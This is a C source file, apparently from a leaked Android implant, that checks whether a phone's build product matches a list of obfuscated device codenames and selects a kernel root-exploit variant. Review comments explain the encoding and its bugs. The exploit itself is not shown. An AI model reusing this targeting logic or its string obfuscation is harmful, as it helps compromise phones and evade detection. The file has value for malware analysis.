hackedteam/core-android-native

selinux_native/jni/kernel_waiter_exploit/check.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <sys/system_properties.h>
#include "log.h"
#include "waiter_exploit.h"

/*
 * Obfuscated string table.
 *
 * In this file these arrays are only ever read through deobfuscate(); the
 * trailing comment on each line is the author's stated plaintext. The decoding
 * routine itself is not in this file. Every array here is exactly three bytes
 * longer than its commented plaintext (not counting the implicit NUL), which
 * suggests a 3-byte header followed by one encoded byte per character
 * -- TODO confirm against deobfuscate().
 *
 * Analysis note: because the device codenames and property names are stored
 * encoded, a plain string search of the compiled object for the plaintexts
 * below is not expected to match; the encoded byte sequences are what appear
 * in the data section.
 */

/* Entries referenced from default_list. */
unsigned char mako[] = "\xec\x3e\xd6\x81\xf5\xfb\xff"; // "mako"
unsigned char m7[] = "\x2a\x85\xad\x49\x27"; // "m7"
unsigned char hammer[] = "\xa5\x56\xf9\x75\x4c\x48\x48\x40\x7b\x75\x40\x4c\x41"; // "hammerhead"
unsigned char grouper[] = "\x84\xd8\x5b\x63\x16\x1b\x11\x14\x61\x16"; // "grouper"
unsigned char huawei[] = "\xd8\x09\xd9\x83\xff\xfd\xf8\xf7\x9f\xf8\xf8"; // "Y530-U00"
unsigned char hua_g6[] = "\x29\xdc\xf3\x96\x27\x3c\x84\x28\x29"; // "G6-U10"
unsigned char g2[] = "\x5a\x09\x51\x4f\x78"; // "g2"
unsigned char lg_l90[] = "\x3b\x27\x1f\x54\x14\x5b"; // "w7n"
/* Disabled entry: s4mini is not defined, so nothing below can reference it. */
//unsigned char s4mini[] = "\xc0\xfd\x37\x4d\x5f\x52\x52\x63\x56\x51\x54\x4c\x5f"; // "serranolte"
unsigned char xp_m2[] = "\x99\x7d\xe1\x27\x55\x5a\x5b\x5a"; // "D2303"
unsigned char cancro[] = "\x7d\x03\x78\x22\x1c\x15\x22\x11\x16"; // "cancro"

/* Entries referenced from samsung_list, samsung_old_list and sam_grand_list. */
unsigned char s5_klte[] = "\x2a\xf6\xd8\xc1\xca\xa2\xb3"; // "klte"
unsigned char s4_jflte[] = "\xcd\xca\x02\xbb\xbf\xa1\x49\xb8"; // "jflte"
unsigned char tab2[] = "\x25\x42\x63\xd1\x15\x1a\xc6"; // "t03g"
unsigned char m0[] = "\x0b\x11\x18\x66\x5d"; // "m0"
unsigned char s_grand[] = "\xcd\x8d\x4a\xb1\xb4\xb5\xb5\xbc\xbd\xa3\xbc\xcb\xb8"; // "baffinlite"

/* Checked on its own (not through a list) as the last test in
 * waiter_exploit_check_exploitability(). */
unsigned char goldfish[] = "\x61\x16\x70\x0a\x0c\x33\x0c\x3f\x08\x0e"; // "generic"

/* Names of the two system properties queried with __system_property_get(). */
unsigned char product[] = "\x61\xff\x8e\xed\xf2\xb1\xfd\xec\xf8\xf3\xfb\xb1\xef\xed\xf2\xfb\xec\xfe\xeb"; // "ro.build.product"
unsigned char model[] = "\xed\xa0\x5d\x9f\x82\xc3\x9d\x9f\x82\x89\x98\x8e\x99\xc3\x80\x82\x89\x88\x81"; // "ro.product.model"



/*
 * Per-class tables of encoded device strings. Each table is scanned by
 * waiter_exploit_check_exploitability(), and a hit in a table selects the
 * return code named in the comment above it. The element count is derived
 * there as sizeof(table)/4, so the tables carry no terminator entry.
 */

/* Hit -> DEFAULT. */
unsigned char *default_list[] = {
  mako,
  m7,
  hammer,
  grouper,
  huawei,
  hua_g6,
  lg_l90,
  xp_m2,
  cancro,
  g2
};

/* Hit -> SAMSUNG. */
unsigned char *samsung_list[] = {
  s5_klte,
  s4_jflte
};

/* Hit -> SAMSUNG_OLD. */
unsigned char *samsung_old_list[] = {
  tab2,
  m0

};

/* Hit -> SAM_GRAND. */
unsigned char *sam_grand_list[] = {
    s_grand
};

/*
 * Hit -> TEST. The only entry is commented out, leaving an empty initializer.
 * NOTE(review): an empty brace initializer is not ISO C before C23 and relies
 * on a compiler extension; where it is accepted the table has no elements, so
 * the TEST scan presumably never executes -- confirm with the actual toolchain.
 */
unsigned char *test_list[] = {
  //s4mini
};


/*
 * Classify the running device against the encoded device tables.
 *
 * Reads two system properties, whose names come from deobfuscate(product) and
 * deobfuscate(model), into local buffers. It then compares the first value
 * against each table in a fixed order: default_list, samsung_list, test_list,
 * samsung_old_list, sam_grand_list, and finally the single goldfish entry.
 * The first hit decides the result.
 *
 * Returns DEFAULT, SAMSUNG, TEST, SAMSUNG_OLD, SAM_GRAND or GOLDFISH on a hit,
 * and NO_SUPPORT otherwise. These constants are not defined in this file
 * (presumably in waiter_exploit.h -- not visible here).
 *
 * Analysis notes, all taken from the code below:
 *  - Only value_pr takes part in the comparisons; value_md is fetched and then
 *    never read.
 *  - The return value of __system_property_get() is ignored, so a missing
 *    property is not told apart from a present one.
 *  - strstr() is called with the table entry as the haystack and the property
 *    value as the needle. A hit therefore means "the property value occurs
 *    inside the table entry", not the reverse. Since strstr() with an empty
 *    needle returns the haystack, an empty value_pr hits the first
 *    default_list entry and the function returns DEFAULT.
 *  - Element counts are computed as sizeof(table)/4, which equals the number
 *    of entries only where a pointer is 4 bytes wide. On a target with wider
 *    pointers the loops would index past the end of each table.
 *  - The LOGD format string is a plain literal in this file, unlike the device
 *    and property strings. Whether LOGD emits anything depends on log.h, which
 *    is not visible here.
 *  - deobfuscate() is called again for the log line rather than reusing the
 *    first result; its buffer ownership and lifetime cannot be determined
 *    from this file.
 */
int waiter_exploit_check_exploitability() {
  char value_pr[256];
  char value_md[256];
  int i = 0;

  /* Fetch the two properties; results are not checked. */
  __system_property_get(deobfuscate(product), value_pr);
  __system_property_get(deobfuscate(model), value_md);


  /* Scan default_list: hit -> DEFAULT. */
  for(i = 0; i < (sizeof(default_list)/4); i++) {
    if(strstr(deobfuscate(default_list[i]), value_pr)) {
      LOGD("[CHECK] Found supported device %s\n", deobfuscate(default_list[i]));
      return DEFAULT;
    }
  }

  /* Scan samsung_list: hit -> SAMSUNG. */
  for(i = 0; i < (sizeof(samsung_list)/4); i++) {
    if(strstr(deobfuscate(samsung_list[i]), value_pr)) {
      LOGD("[CHECK] Found supported device %s\n", deobfuscate(samsung_list[i]));
      return SAMSUNG;
    }
  }

  /* Scan test_list: hit -> TEST. The table has no active entries in this file. */
  for(i = 0; i < (sizeof(test_list)/4); i++) {
    if(strstr(deobfuscate(test_list[i]), value_pr)) {
      LOGD("[CHECK] Found supported device %s\n", deobfuscate(test_list[i]));
      return TEST;
    }
  }
  
  /* Scan samsung_old_list: hit -> SAMSUNG_OLD. */
  for(i = 0; i < (sizeof(samsung_old_list)/4); i++) {
    if(strstr(deobfuscate(samsung_old_list[i]), value_pr)) {
      LOGD("[CHECK] Found supported device %s\n", deobfuscate(samsung_old_list[i]));
      return SAMSUNG_OLD;
    }
  }

  /* Scan sam_grand_list: hit -> SAM_GRAND. */
  for(i = 0; i < (sizeof(sam_grand_list)/4); i++) {
    if(strstr(deobfuscate(sam_grand_list[i]), value_pr)) {
      LOGD("[CHECK] Found supported device %s\n", deobfuscate(sam_grand_list[i]));
      return SAM_GRAND;
    }
  }

  /* Single-entry check against the goldfish string: hit -> GOLDFISH. */
  if(strstr(deobfuscate(goldfish), value_pr)) {
    LOGD("[CHECK] Found supported device %s\n", deobfuscate(goldfish));
    return GOLDFISH;
  }


  
  /* No table produced a hit. */
  return NO_SUPPORT;
}